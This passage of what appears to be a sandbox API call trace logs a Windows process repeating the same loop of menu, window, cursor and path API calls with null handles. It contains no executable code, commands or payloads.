(hMenu=0x0, nPos=-1) returned 0x0 [0027.722] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.722] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.722] GetStockObject (i=6) returned 0x1b00018 [0027.722] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.722] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.722] PathFileExistsW (pszPath=0x0) returned 0 [0027.722] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.722] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.722] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.723] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.723] GetMenu (hWnd=0x0) returned 0x0 [0027.723] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.723] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.723] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.723] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.723] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.723] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.723] GetStockObject (i=6) returned 0x1b00018 [0027.723] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.723] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.723] PathFileExistsW (pszPath=0x0) returned 0 [0027.723] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.723] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.723] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.723] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.723] GetMenu (hWnd=0x0) returned 0x0 [0027.723] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x211) returned -1 [0027.723] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.723] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.723] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.723] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.723] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.723] GetStockObject (i=6) returned 0x1b00018 [0027.723] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.723] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.723] PathFileExistsW (pszPath=0x0) returned 0 [0027.723] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.723] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.723] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.723] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.723] GetMenu (hWnd=0x0) returned 0x0 [0027.723] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.723] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.723] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.724] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.724] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.724] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.724] GetStockObject (i=6) returned 0x1b00018 [0027.724] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.724] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.724] PathFileExistsW (pszPath=0x0) returned 0 [0027.724] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.724] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.724] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.724] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.724] GetMenu (hWnd=0x0) returned 0x0 [0027.724] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.724] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.724] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.724] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.724] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.724] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.724] GetStockObject (i=6) returned 0x1b00018 [0027.724] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.724] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.724] PathFileExistsW (pszPath=0x0) returned 0 [0027.724] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.724] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.724] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.724] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.724] GetMenu (hWnd=0x0) returned 0x0 [0027.724] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.724] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.724] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.724] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.724] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.724] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.725] GetStockObject (i=6) returned 0x1b00018 [0027.725] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.725] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.725] PathFileExistsW (pszPath=0x0) returned 0 [0027.725] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.725] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.725] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.725] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.725] GetMenu (hWnd=0x0) returned 0x0 [0027.725] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.725] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.725] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.725] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.725] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.725] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.725] GetStockObject (i=6) returned 0x1b00018 [0027.725] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.725] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.725] PathFileExistsW (pszPath=0x0) returned 0 [0027.725] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.725] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.725] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.725] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.725] GetMenu (hWnd=0x0) returned 0x0 [0027.725] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x1e0) returned -1 [0027.725] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.725] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.725] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.725] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.725] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.725] GetStockObject (i=6) returned 0x1b00018 [0027.725] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.725] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.726] PathFileExistsW (pszPath=0x0) returned 0 [0027.726] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.726] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.726] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.726] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.726] GetMenu (hWnd=0x0) returned 0x0 [0027.726] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.726] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.726] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.726] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.726] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.726] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.726] GetStockObject (i=6) returned 0x1b00018 [0027.726] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.726] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.726] PathFileExistsW (pszPath=0x0) returned 0 [0027.726] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.726] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.726] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.726] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.726] GetMenu (hWnd=0x0) returned 0x0 [0027.726] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.726] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.726] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.726] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.726] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.726] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.726] GetStockObject (i=6) returned 0x1b00018 [0027.726] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.726] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.726] PathFileExistsW (pszPath=0x0) returned 0 [0027.726] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.726] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.727] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.727] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.727] GetMenu (hWnd=0x0) returned 0x0 [0027.727] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.727] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.727] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.727] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.727] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.727] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.727] GetStockObject (i=6) returned 0x1b00018 [0027.727] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.727] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.727] PathFileExistsW (pszPath=0x0) returned 0 [0027.727] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.727] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.727] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.727] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.727] GetMenu (hWnd=0x0) returned 0x0 [0027.727] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.727] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.727] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.727] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.727] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.727] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.727] GetStockObject (i=6) returned 0x1b00018 [0027.727] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.727] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.727] PathFileExistsW (pszPath=0x0) returned 0 [0027.727] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.727] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.727] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.727] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.727] GetMenu (hWnd=0x0) returned 0x0 [0027.727] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x374) returned -1 [0027.728] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.728] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.728] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.728] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.728] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.728] GetStockObject (i=6) returned 0x1b00018 [0027.728] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.728] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.728] PathFileExistsW (pszPath=0x0) returned 0 [0027.728] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.728] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.728] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.728] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.728] GetMenu (hWnd=0x0) returned 0x0 [0027.728] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.728] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.728] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.728] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.728] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.728] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.728] GetStockObject (i=6) returned 0x1b00018 [0027.728] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.728] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.728] PathFileExistsW (pszPath=0x0) returned 0 [0027.728] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.728] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.728] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.728] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.728] GetMenu (hWnd=0x0) returned 0x0 [0027.728] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.728] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.728] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.728] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.729] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.729] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.729] GetStockObject (i=6) returned 0x1b00018 [0027.729] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.729] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.729] PathFileExistsW (pszPath=0x0) returned 0 [0027.729] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.729] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.729] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.729] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.729] GetMenu (hWnd=0x0) returned 0x0 [0027.729] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.729] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.729] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.729] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.729] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.729] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.729] GetStockObject (i=6) returned 0x1b00018 [0027.729] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.729] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.729] PathFileExistsW (pszPath=0x0) returned 0 [0027.729] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.729] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.729] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.729] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.729] GetMenu (hWnd=0x0) returned 0x0 [0027.729] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x332) returned -1 [0027.729] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.729] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.729] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.729] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.729] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.730] GetStockObject (i=6) returned 0x1b00018 [0027.730] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.730] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.730] PathFileExistsW (pszPath=0x0) returned 0 [0027.730] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.730] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.730] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.730] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.730] GetMenu (hWnd=0x0) returned 0x0 [0027.730] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3ae) returned -1 [0027.730] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.730] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.730] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.730] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.730] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.730] GetStockObject (i=6) returned 0x1b00018 [0027.730] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.730] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.730] PathFileExistsW (pszPath=0x0) returned 0 [0027.730] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.730] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.730] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.730] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.730] GetMenu (hWnd=0x0) returned 0x0 [0027.730] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.730] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.730] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.731] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.731] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.731] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.731] GetStockObject (i=6) returned 0x1b00018 [0027.731] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.731] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.731] PathFileExistsW (pszPath=0x0) returned 0 [0027.731] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.731] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.731] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.731] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.731] GetMenu (hWnd=0x0) returned 0x0 [0027.731] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.731] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.731] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.731] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.731] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.731] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.731] GetStockObject (i=6) returned 0x1b00018 [0027.731] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.731] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.731] PathFileExistsW (pszPath=0x0) returned 0 [0027.731] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.731] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.731] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.731] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.731] GetMenu (hWnd=0x0) returned 0x0 [0027.731] 